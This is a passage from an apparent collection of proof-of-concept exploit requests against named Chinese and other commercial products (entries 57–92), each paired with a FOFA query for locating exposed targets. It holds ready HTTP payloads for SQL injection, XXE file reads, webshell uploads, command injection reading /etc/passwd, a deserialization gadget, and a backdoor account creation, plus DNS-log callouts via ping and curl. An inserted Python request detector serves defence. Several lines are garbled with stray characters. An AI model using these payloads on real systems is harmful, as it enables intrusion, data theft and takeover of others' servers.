    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

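Three body-level patterns recur on this page and are cheap to detect at a reverse proxy, a WAF or in request logs: a DTD or entity declaration inside an XML body (the XXE entries 36 to 38, 40 and 45), a Fastjson `@type` hint or a JNDI URL in a form field (the Fastjson probe at the top of this section and entry 25), and a .NET `__type` hint naming the `ObjectDataProvider`/`Process` chain (entries 54 and 56). The detector below is an added example, not code from the original post or from any vendor: it parses a raw request, decodes form fields exactly once (so the `%26xxe1two%3b` in entry 36 is seen as `&xxe1two;`), and reports which rule matched and on what. The sample requests are constructed from the POCs above with placeholder hosts; the rule names are my own.

```python
"""Request-body detection for the XXE, Fastjson/JNDI and .NET ObjectDataProvider
patterns used by the POCs on this page. Added example, not code from the original
post or any vendor; samples are constructed from the POCs with placeholder hosts."""
import re
from urllib.parse import parse_qsl, unquote

# Each rule: (name, regex). A capture group, when present, is reported with the hit.
RULES = [
    ("xml-dtd", re.compile(r"<!DOCTYPE\b", re.I)),        # none of these APIs needs a DTD
    ("xml-entity", re.compile(r"<!ENTITY\b", re.I)),
    ("fastjson-autotype", re.compile(r'"@type"\s*:\s*"([\w.$]+)"')),
    ("dotnet-type-hint", re.compile(
        r'"__type"\s*:\s*"(System\.Windows\.Data\.ObjectDataProvider'
        r'|System\.Diagnostics\.Process(?:StartInfo)?)\b')),
    ("jndi-url", re.compile(r"\b(ldaps?|rmi|iiop|dns)://", re.I)),
]


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers, body); header names lower-cased."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def views(path: str, headers: dict, body: str):
    """Every string the rules should see: the raw body, the decoded path and each form
    field decoded once. The raw body stays in the set on purpose: a DOCTYPE in a
    non-form body is visible without decoding, and decoding twice would let a
    double-encoded payload slip through."""
    yield body
    yield unquote(path)
    if "x-www-form-urlencoded" in headers.get("content-type", ""):
        for _, value in parse_qsl(body, keep_blank_values=True):
            yield value
    else:
        yield unquote(body)


def inspect_request(raw: str) -> list[str]:
    """Return sorted, de-duplicated findings such as 'jndi-url=ldap' or 'xml-entity'."""
    _, path, headers, body = parse_request(raw)
    findings = set()
    for text in views(path, headers, body):
        for name, rx in RULES:
            for m in rx.finditer(text):
                findings.add(f"{name}={m.group(1)}" if m.groups() else name)
    return sorted(findings)


# Constructed samples, built from the POCs above with placeholder hosts.
SAMPLES = {
    "xxe-soapFormat": (
        "POST /uapws/soapFormat.ajax HTTP/1.1\r\nHost: nc.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        'msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]>'
        "<soap:Envelope><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b"
        "</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a"
    ),
    "jndi-registerServlet": (
        "POST /portal/registerServlet HTTP/1.1\r\nHost: nc.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\ntype=1&dsname=ldap://attacker.example"
    ),
    "dotnet-odp": (
        "POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx"
        "?method=GetStoreWarehouseByStore HTTP/1.1\r\nHost: tplus.example\r\n"
        "Content-Type: application/json\r\n\r\n"
        '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, '
        'Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start",'
        '"ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, '
        'Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"__type":'
        '"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, '
        'PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c whoami"}}}}'
    ),
    "fastjson-url": (
        "POST /api HTTP/1.1\r\nHost: app.example\r\nContent-Type: application/json\r\n\r\n"
        '{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://dnslog.example"}}""}'
    ),
    "benign-login": (
        "POST /login HTTP/1.1\r\nHost: app.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\nusername=admin&password=Sup3r%26Secret"
    ),
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(f"{label:22} {inspect_request(req)}")
```

The `@type` rule fires on any class name on purpose: `java.net.URL` and `com.sun.rowset.JdbcRowSetImpl` are confirmed Fastjson gadgets, while an unfamiliar class is a question about whether the parser has autotype enabled at all. Run the detector on the request as received, before the application decodes anything, and alert on the raw-body hits first; those need no decoding assumptions.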
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

3 s. q* u, w9 ?8 O58. 畅捷通T+ KeyInfoList.aspx sql注入
2 D9 H* ~* U% qFOFA:app="畅捷通-TPlus"
( O5 A) k1 N5 uGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.13 T5 G$ l- y* B* J k. g
Host: your-ip
; E+ q- R1 y& }+ c# P+ dUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 U8 S( u( w3 Y# } R0 x8 r$ aAccept-Charset: utf-8& I) I" ]1 {+ Y2 W* n# j% s
Accept-Encoding: gzip, deflate/ Y# q( j3 Z' d* w. Q) M4 t
Connection: close
! e& n* q# V! d; Q
9 Z4 J; }4 y) v- o
59. XETUX dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file to write, dir gives the directory it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file can be reached at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器远程命令执行: n- O* C1 P7 v
FOFA:BYTEVALUE 智能流控路由器4 a0 y7 G6 Y& ]
GET /goform/webRead/open/?path=|id HTTP/1.1
8 F5 p) Y$ U3 Q% G: M. h9 XHost:IP2 }2 J7 t7 S5 l+ a( o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
* J G0 e8 r% ^- |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' l3 s U/ a6 p% t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 O, w/ x/ s" u! h g1 `Accept-Encoding: gzip, deflate
V; P0 Z) o; MConnection: close% w. k+ D( i& H% x- D. w% ]
Upgrade-Insecure-Requests: 1
, q( t1 u& i3 e0 C) m& U' t7 k3 m5 M* \+ X- O& T
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

